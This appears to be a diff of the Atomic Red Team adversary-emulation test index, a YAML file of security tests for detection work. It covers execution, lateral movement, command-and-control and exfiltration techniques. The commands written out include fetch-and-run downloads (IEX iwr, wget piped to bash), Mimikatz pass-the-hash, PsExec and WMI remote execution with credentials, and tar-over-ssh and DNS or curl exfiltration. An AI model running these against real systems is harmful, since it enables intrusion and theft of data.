$which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' 
@@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: 
@@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" -' + ' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} 
@@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. -' + ' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} -' + ' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt -' + ' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" 
@@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null -' + ' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore -' + ' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. -' + ' supported_platforms: - windows input_arguments: 
@@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) -' + ' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} -' + ' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. -' + ' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" -' + ' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 -' + ' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 
@@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") -' + ' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} -' + ' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} -' + ' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA -' + ' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. -' + ' supported_platforms: - windows input_arguments: 
@@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" -' + ' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" -' + ' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -' + ' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt 
@@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force 
@@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. -' + ' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt -' + ' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares -' + ' supported_platforms: - windows input_arguments: 
@@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" -' + ' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} -' + ' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). -' + ' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 -' + ' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: 
@@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force -' + ' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} -' + ' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} -' + ' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} -' + ' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos 
@@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' -' + ' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! -' + ' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} -' + ' cleanup_command: 'del #{local_path} >nul 2>&1 -' + ' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! -' + ' supported_platforms: - windows input_arguments: 
@@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} -' + ' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") -' + ' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. -' + ' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility -' + ' supported_platforms: - linux - macos 
@@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present -' + ' prereq_command: 'which whois && which timeout -' + ' get_prereq_command: 'echo "Please install timeout and the whois package" -' + ' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} -' + ' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl 
@@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} -' + ' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} -' + ' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) -' + ' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} -' + ' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} -' + ' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. -' + ' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} -' + ' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } -' + ' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b 
@@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. -' + ' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks -' + ' supported_platforms: - macos - linux 
@@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 -' + ' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; -' + ' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz -' + ' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' -' + ' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) -' + ' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} -' + ' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - windows input_arguments: 
